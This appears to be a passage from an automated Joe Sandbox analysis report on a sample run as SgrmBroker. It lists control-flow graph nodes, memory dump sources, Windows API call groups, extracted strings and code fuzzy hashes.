7ff6d9dd0b1f-7ff6d9dd0b48 4124->4125 4125->4106 4129 7ff6d9dd0b4e 4125->4129 4126->4095 4127->4090 4127->4121 4128->4125 4129->4107
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5f6c62ab2db21098160880d27bb8cad0d1082af47fb6b289407d2f1f7a8c4d3a
                                                                                      • Instruction ID: c4c157599256169a3a72078c36042f43e23d30a6a7c29809c0f646ba4d1162ca
                                                                                      • Opcode Fuzzy Hash: 5f6c62ab2db21098160880d27bb8cad0d1082af47fb6b289407d2f1f7a8c4d3a
                                                                                      • Instruction Fuzzy Hash: 57712222F1CF5645FB684E21D95023E6A91BFC4798F085336DA6E867D4DE7CE0609B00
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF6D9DD0E00: CoInitializeEx.COMBASE(?,?,?,?,?,?,?,?,?,?,00007FF6D9CF8ACC), ref: 00007FF6D9DD0E0D
                                                                                        • Part of subcall function 00007FF6D9DD0E00: CoInitializeSecurity.COMBASE ref: 00007FF6D9DD0E4E
                                                                                        • Part of subcall function 00007FF6D9DD0E00: GetErrorInfo.OLEAUT32 ref: 00007FF6D9DD0E6A
                                                                                      • HeapFree.KERNEL32 ref: 00007FF6D9CFB576
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize$ErrorFreeHeapInfoSecurity
                                                                                      • String ID:
                                                                                      • API String ID: 3052856675-0
                                                                                      • Opcode ID: 0f48b1aa49b6190a7b16018d7c58fe59604f862a2086cf6f194656bd0caab654
                                                                                      • Instruction ID: ecfdaa87f9886f7e8d7aa4b1dca3961e99565eed0827b14269e0759acb9d7a4c
                                                                                      • Opcode Fuzzy Hash: 0f48b1aa49b6190a7b16018d7c58fe59604f862a2086cf6f194656bd0caab654
                                                                                      • Instruction Fuzzy Hash: BE32B136609BC494D671CB15F4813DAB7A8F799784F508226DACC83B69DFBCD1A4CB40
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 5b0d1d7fd54f2b927ec463458e338d930c35b5a77488b728646247ff87a8c530
                                                                                      • Instruction ID: dba7660b1704b2d10da359130db7e2d2a40a5569f35b14e0e0c71ac55b5e9d19
                                                                                      • Opcode Fuzzy Hash: 5b0d1d7fd54f2b927ec463458e338d930c35b5a77488b728646247ff87a8c530
                                                                                      • Instruction Fuzzy Hash: 1B919F23A09A8582E7558F16E54037DB7A0F798BA4F448232EF9D43795DF3CE9A1CB00

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3141 7ff6d9cf1ded-7ff6d9cf1e5a VariantToPropVariant 3142 7ff6d9cf1f53-7ff6d9cf1f87 GetErrorInfo PropVariantClear 3141->3142 3143 7ff6d9cf1e60-7ff6d9cf1ec3 PropVariantToBSTR 3141->3143 3144 7ff6d9cf1ff5-7ff6d9cf2016 3142->3144 3145 7ff6d9cf1fbc-7ff6d9cf1fdc GetErrorInfo 3143->3145 3146 7ff6d9cf1ec9-7ff6d9cf1ece 3143->3146 3149 7ff6d9cf2021-7ff6d9cf209a call 7ff6d9d2e0c0 3144->3149 3150 7ff6d9cf2018-7ff6d9cf201b 3144->3150 3147 7ff6d9cf1fe7-7ff6d9cf1fef PropVariantClear 3145->3147 3148 7ff6d9cf1fde-7ff6d9cf1fe1 SysFreeString 3145->3148 3146->3147 3147->3144 3148->3147 3153 7ff6d9cf20a2-7ff6d9cf20a5 3149->3153 3154 7ff6d9cf209c SysFreeString 3149->3154 3150->3149 3155 7ff6d9cf17dd-7ff6d9cf1802 GetErrorInfo 3153->3155 3156 7ff6d9cf20ab-7ff6d9cf20d2 3153->3156 3154->3153 3159 7ff6d9cf1804-7ff6d9cf180a 3155->3159 3160 7ff6d9cf180c-7ff6d9cf26e0 3155->3160 3158 7ff6d9cf20e0-7ff6d9cf20e8 3156->3158 3161 7ff6d9cf20f0-7ff6d9cf21b9 call 7ff6d9dd2010 3158->3161 3159->3160 3176 7ff6d9cf26e3-7ff6d9cf26f7 3160->3176 3167 7ff6d9cf21bf 3161->3167 3168 7ff6d9cf224d-7ff6d9cf225e VariantClear 3161->3168 3169 7ff6d9cf21c3-7ff6d9cf21d4 VariantClear 3167->3169 3170 7ff6d9cf2260-7ff6d9cf2264 3168->3170 3171 7ff6d9cf229c-7ff6d9cf22a4 3168->3171 3173 7ff6d9cf21da-7ff6d9cf21de 3169->3173 3174 7ff6d9cf255b-7ff6d9cf256d 3169->3174 3170->3171 3175 7ff6d9cf2266-7ff6d9cf2282 3170->3175 3177 7ff6d9cf22ac-7ff6d9cf2310 call 7ff6d9cf7210 3171->3177 3173->3174 3178 7ff6d9cf21e4-7ff6d9cf2200 3173->3178 3183 7ff6d9cf2571-7ff6d9cf25c2 3174->3183 3179 7ff6d9cf2288-7ff6d9cf228e 3175->3179 3180 7ff6d9cf2529-7ff6d9cf252b 3175->3180 3181 7ff6d9cf26ff-7ff6d9cf2734 3176->3181 3194 7ff6d9cf2759-7ff6d9cf2784 3177->3194 3195 7ff6d9cf2316-7ff6d9cf2379 call 7ff6d9cf4b50 3177->3195 3184 7ff6d9cf2202-7ff6d9cf2208 3178->3184 3185 7ff6d9cf2210-7ff6d9cf2215 3178->3185 3179->3155 3186 7ff6d9cf2294-7ff6d9cf2296 
3179->3186 3180->3171 3187 7ff6d9cf2531-7ff6d9cf2537 3180->3187 3189 7ff6d9cf25c4-7ff6d9cf25d5 HeapFree 3183->3189 3190 7ff6d9cf25db-7ff6d9cf25ee call 7ff6d9cf3d90 3183->3190 3184->3185 3192 7ff6d9cf220a 3184->3192 3185->3174 3193 7ff6d9cf221b-7ff6d9cf2246 GetProcessHeap HeapFree 3185->3193 3186->3171 3186->3187 3187->3193 3189->3190 3201 7ff6d9cf25f4-7ff6d9cf2604 3190->3201 3202 7ff6d9cf27d0-7ff6d9cf27d9 3190->3202 3192->3155 3193->3177 3199 7ff6d9cf2248 3193->3199 3194->3189 3198 7ff6d9cf278a 3194->3198 3203 7ff6d9cf250f-7ff6d9cf251f call 7ff6d9ddef40 3195->3203 3204 7ff6d9cf237f-7ff6d9cf23b3 3195->3204 3198->3190 3199->3183 3205 7ff6d9cf2622-7ff6d9cf2627 3201->3205 3206 7ff6d9cf27ef-7ff6d9cf27fc 3202->3206 3207 7ff6d9cf27db-7ff6d9cf27e9 HeapFree 3202->3207 3214 7ff6d9cf2524 3203->3214 3208 7ff6d9cf23b6-7ff6d9cf23cf 3204->3208 3210 7ff6d9cf2610-7ff6d9cf261c 3205->3210 3211 7ff6d9cf2629-7ff6d9cf2638 HeapFree 3205->3211 3218 7ff6d9cf27fe-7ff6d9cf2825 3206->3218 3219 7ff6d9cf282a-7ff6d9cf283a 3206->3219 3207->3206 3212 7ff6d9cf23d1-7ff6d9cf23db 3208->3212 3213 7ff6d9cf242a-7ff6d9cf2440 3208->3213 3210->3202 3210->3205 3211->3210 3216 7ff6d9cf23fd-7ff6d9cf2409 3212->3216 3217 7ff6d9cf23dd-7ff6d9cf23f5 3212->3217 3220 7ff6d9cf2442-7ff6d9cf245b call 7ff6d9dd4ee0 3213->3220 3221 7ff6d9cf2420-7ff6d9cf2428 3213->3221 3214->3180 3222 7ff6d9cf240f-7ff6d9cf241a 3216->3222 3223 7ff6d9cf24e6-7ff6d9cf24f4 3216->3223 3217->3216 3218->3181 3219->3176 3220->3221 3229 7ff6d9cf245d-7ff6d9cf249b 3220->3229 3221->3212 3221->3213 3222->3208 3225 7ff6d9cf199e-7ff6d9cf1a28 3223->3225 3226 7ff6d9cf24fa-7ff6d9cf250a 3223->3226 3228 7ff6d9cf1a30-7ff6d9cf1a38 3225->3228 3226->3225 3230 7ff6d9cf1a3e-7ff6d9cf1a49 3228->3230 3231 7ff6d9cf278f-7ff6d9cf27ca 3228->3231 3232 7ff6d9cf24b4-7ff6d9cf24d1 3229->3232 3233 7ff6d9cf249d-7ff6d9cf24ae HeapFree 3229->3233 3230->3155 3235 7ff6d9cf1a4f-7ff6d9cf1a5b 3230->3235 3231->3201 3231->3202 3232->3228 3234 7ff6d9cf24d7-7ff6d9cf24e1 call 7ff6d9cf3f10 
3232->3234 3233->3232 3234->3228 3237 7ff6d9cf1a80 3235->3237 3238 7ff6d9cf1a5d-7ff6d9cf1a71 call 7ff6d9dc9960 3235->3238 3241 7ff6d9cf1a85-7ff6d9cf1aa2 call 7ff6d9dd4fe0 3237->3241 3238->3241 3244 7ff6d9cf1a73 3238->3244 3246 7ff6d9cf1c30-7ff6d9cf1c52 3241->3246 3247 7ff6d9cf1aa8-7ff6d9cf1aaf 3241->3247 3244->3155 3249 7ff6d9cf1c59-7ff6d9cf1c86 3246->3249 3247->3155 3248 7ff6d9cf1ab5-7ff6d9cf1ad8 GetProcessHeap HeapAlloc 3247->3248 3248->3155 3250 7ff6d9cf1ade-7ff6d9cf1b09 3248->3250 3253 7ff6d9cf1cd0-7ff6d9cf1cf3 GetErrorInfo 3249->3253 3254 7ff6d9cf1c88-7ff6d9cf1c96 3249->3254 3251 7ff6d9cf1b34-7ff6d9cf1b37 3250->3251 3255 7ff6d9cf1b39-7ff6d9cf1b3c 3251->3255 3256 7ff6d9cf1b16 3251->3256 3253->3169 3262 7ff6d9cf1cf9-7ff6d9cf1d01 3253->3262 3258 7ff6d9cf1d10-7ff6d9cf1d34 call 7ff6d9dd10b0 3254->3258 3259 7ff6d9cf1c98-7ff6d9cf1c9e 3254->3259 3260 7ff6d9cf1b42-7ff6d9cf1b49 3255->3260 3261 7ff6d9cf1bf0-7ff6d9cf1c1f 3255->3261 3257 7ff6d9cf1b19-7ff6d9cf1b31 3256->3257 3257->3251 3273 7ff6d9cf1d9a-7ff6d9cf1db1 3258->3273 3274 7ff6d9cf1d36-7ff6d9cf1d52 3258->3274 3263 7ff6d9cf1ca4-7ff6d9cf1cbb 3259->3263 3264 7ff6d9cf1f45-7ff6d9cf1fb7 3259->3264 3265 7ff6d9cf1b10-7ff6d9cf1b13 3260->3265 3266 7ff6d9cf1b4b-7ff6d9cf1b5e 3260->3266 3261->3249 3262->3169 3263->3253 3264->3158 3275 7ff6d9cf1d5a-7ff6d9cf1d95 3264->3275 3265->3256 3269 7ff6d9cf1b60-7ff6d9cf1b74 3266->3269 3270 7ff6d9cf1ba1-7ff6d9cf1bab 3266->3270 3276 7ff6d9cf1bb0-7ff6d9cf1bc0 3269->3276 3277 7ff6d9cf1b76-7ff6d9cf1b99 3269->3277 3270->3256 3273->3161 3274->3275 3275->3167 3276->3256 3279 7ff6d9cf1bc6-7ff6d9cf1bea 3276->3279 3277->3256 3278 7ff6d9cf1b9f 3277->3278 3278->3279 3279->3257
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$Prop$ClearErrorInfo$FreeString
                                                                                      • String ID:
                                                                                      • API String ID: 570662331-0
                                                                                      • Opcode ID: a549cc1ded32417bf6302d8e63c0067434f630680e4ea3ea17c2ecf6f807ee73
                                                                                      • Instruction ID: 82890b819c60196140dc6517257d723f886c50820e65cad2bf93c7aa608a08ab
                                                                                      • Opcode Fuzzy Hash: a549cc1ded32417bf6302d8e63c0067434f630680e4ea3ea17c2ecf6f807ee73
                                                                                      • Instruction Fuzzy Hash: B2A1F732609BC586E7718F55E4943EEB3B4FB84754F408226DAC983AA8DF7CD159CB40

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$String$ErrorHeapInfo
                                                                                      • String ID: 0$WQLEmptyNullStringI1I2I4I8R4R8BoolUI1UI2UI4UI8ArrayObjectIUnknownWrapperinner
                                                                                      • API String ID: 364368470-1862106893
                                                                                      • Opcode ID: ad48cfbcf0ab5b7cae1183f92f651c627291acb3989c20c33f8edf5d5ce7bd5c
                                                                                      • Instruction ID: bbd6e8f7ea791b8522f9e3ee1ee0ca00d7b45bd521287e9e168f08bc2cdbd3eb
                                                                                      • Opcode Fuzzy Hash: ad48cfbcf0ab5b7cae1183f92f651c627291acb3989c20c33f8edf5d5ce7bd5c
                                                                                      • Instruction Fuzzy Hash: 76A1A322A0DB8181EB658F15A5403BDAB70FB95BD8F049232DE8E477A6DF3CE595C700

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      • ReadProcessMemory returned unexpected number of bytes readUnable to read process dataIntel x86MIPSRISC AlphaPPCSHXARMIntel Itanium-based x64RISC Alpha x64MSIL(Intel or AMD) x64Intel Itanium-based x86unknownARM x64CPU , xrefs: 00007FF6D9DCF21E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFreeHeapLastMemoryProcessRead
                                                                                      • String ID: ReadProcessMemory returned unexpected number of bytes readUnable to read process dataIntel x86MIPSRISC AlphaPPCSHXARMIntel Itanium-based x64RISC Alpha x64MSIL(Intel or AMD) x64Intel Itanium-based x86unknownARM x64CPU
                                                                                      • API String ID: 2093145822-811746041
                                                                                      • Opcode ID: 79e8c1a417f1afa2a78a02ba8c8650f5027d807980a54fb5341c9a1cc1e2f64e
                                                                                      • Instruction ID: 6e8d0a4e51e77b74faa24a3b9dd87ba3a8b00ecd5207726ef6b4abe19d11d612
                                                                                      • Opcode Fuzzy Hash: 79e8c1a417f1afa2a78a02ba8c8650f5027d807980a54fb5341c9a1cc1e2f64e
                                                                                      • Instruction Fuzzy Hash: D021A726709B4691E6609F52BC406BEA6A4FF597A4F844236EEADC77E0DF3CD061D300

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorInfoInitialize$Security
                                                                                      • String ID:
                                                                                      • API String ID: 413594595-0
                                                                                      • Opcode ID: 84103676e15c0cf9c0dac99652f5b94c19bf42f2e318447df2893695f895a070
                                                                                      • Instruction ID: 71f059af7afda498085739e132a91ff85a3d5682fa5161cac4be9946b8f20e4d
                                                                                      • Opcode Fuzzy Hash: 84103676e15c0cf9c0dac99652f5b94c19bf42f2e318447df2893695f895a070
                                                                                      • Instruction Fuzzy Hash: FC112132B08B8183EB948F24E45432EB7A1FFC4B58F544236D69A87B94DFBDD4548B40

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalInfoMemoryPerformanceStatus
                                                                                      • String ID: @
                                                                                      • API String ID: 3163563144-2766056989
                                                                                      • Opcode ID: 569f5e5e4de5a2d1dbff4c1db82d7056d41f0377743af30d59fcf5673e13d7c0
                                                                                      • Instruction ID: ab9f39f42b037d413b4be86c8f9783595b9ba6ac550588818965f3df8466340b
                                                                                      • Opcode Fuzzy Hash: 569f5e5e4de5a2d1dbff4c1db82d7056d41f0377743af30d59fcf5673e13d7c0
                                                                                      • Instruction Fuzzy Hash: CF019011958DC192E2364F28E4463F6A3B5BFE4769F005311FAC941754EF7AD2A78B00

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleInitialize$ErrorInfoSecurity
                                                                                      • String ID:
                                                                                      • API String ID: 1445471777-0
                                                                                      • Opcode ID: 6aab80cf292e4e8fd16ad849ef27c9ba43182dc39c57004028da022426039bcd
                                                                                      • Instruction ID: 1b4b9161bd395ba0749fc76d3b5ffb03c51f61b93554cbddccb8c6a07fa874d2
                                                                                      • Opcode Fuzzy Hash: 6aab80cf292e4e8fd16ad849ef27c9ba43182dc39c57004028da022426039bcd
                                                                                      • Instruction Fuzzy Hash: 2221332164DAC181EA659F15A4447BEA770FB85BC8F080536EE8D93799DF7CE854CB00

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap$AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3036504266-0
                                                                                      APIs
                                                                                       Memory Dump Source
                                                                                       • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                       • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmp
                                                                                       • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
                                                                                       • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmp
                                                                                       • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmp
                                                                                       • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmp
                                                                                       Joe Sandbox IDA Plugin
                                                                                       • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastWait
                                                                                      • String ID:
                                                                                      • API String ID: 1574541344-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: ErrorHeapInfo$AllocateFree
                                                                                      • String ID:
                                                                                      • API String ID: 616119989-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: ArgvCommandFreeLineLocal
                                                                                      • String ID:
                                                                                      • API String ID: 1203019955-0
                                                                                      APIs
                                                                                      • RtlReAllocateHeap.NTDLL(?,00000004,00000000,00007FF6D9DE13D3,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF6D9DC9DAD
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: AllocHeap
                                                                                      • String ID:
                                                                                      • API String ID: 4292702814-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: ClipboardErrorLastOpen$Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 2345428929-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FullNamePath
                                                                                      • String ID:
                                                                                      • API String ID: 2482867836-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: FreeHeap$ByteCharErrorLastMultiWide
                                                                                      • String ID: <Truncat$cess$ted>
                                                                                      • API String ID: 3126804124-3772979034
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: AttributeProcThread$InitializeList$FreeHeapUpdate
                                                                                      • String ID:
                                                                                      • API String ID: 3328213773-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: FreeHeap$Error$ConsoleFileHandleLastModeObjectSingleStatusWaitWrite
                                                                                      • String ID:
                                                                                      • API String ID: 1829088854-0
                                                                                      • Opcode ID: 8e87be5dfc692f55cab4f3e7dcfc212c7cba7f4718a063207e5ec0de3b20204e
                                                                                      • Instruction ID: 1ae4ec40af5c8ad7263ba689fcde715cee7cc3247f429d710c82cef66beb6d13
                                                                                      • Opcode Fuzzy Hash: 8e87be5dfc692f55cab4f3e7dcfc212c7cba7f4718a063207e5ec0de3b20204e
                                                                                      • Instruction Fuzzy Hash: 6671E661A0CB8281FB608F25A6503BD67F1EB95798F448233DA9DC36D9DE7DE0A4C700
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1239891234-0
                                                                                      • Opcode ID: 24ec87278d5b50c55761d5e5a74ac69a402749e9621c205fbc0bc0ec95ba6e9c
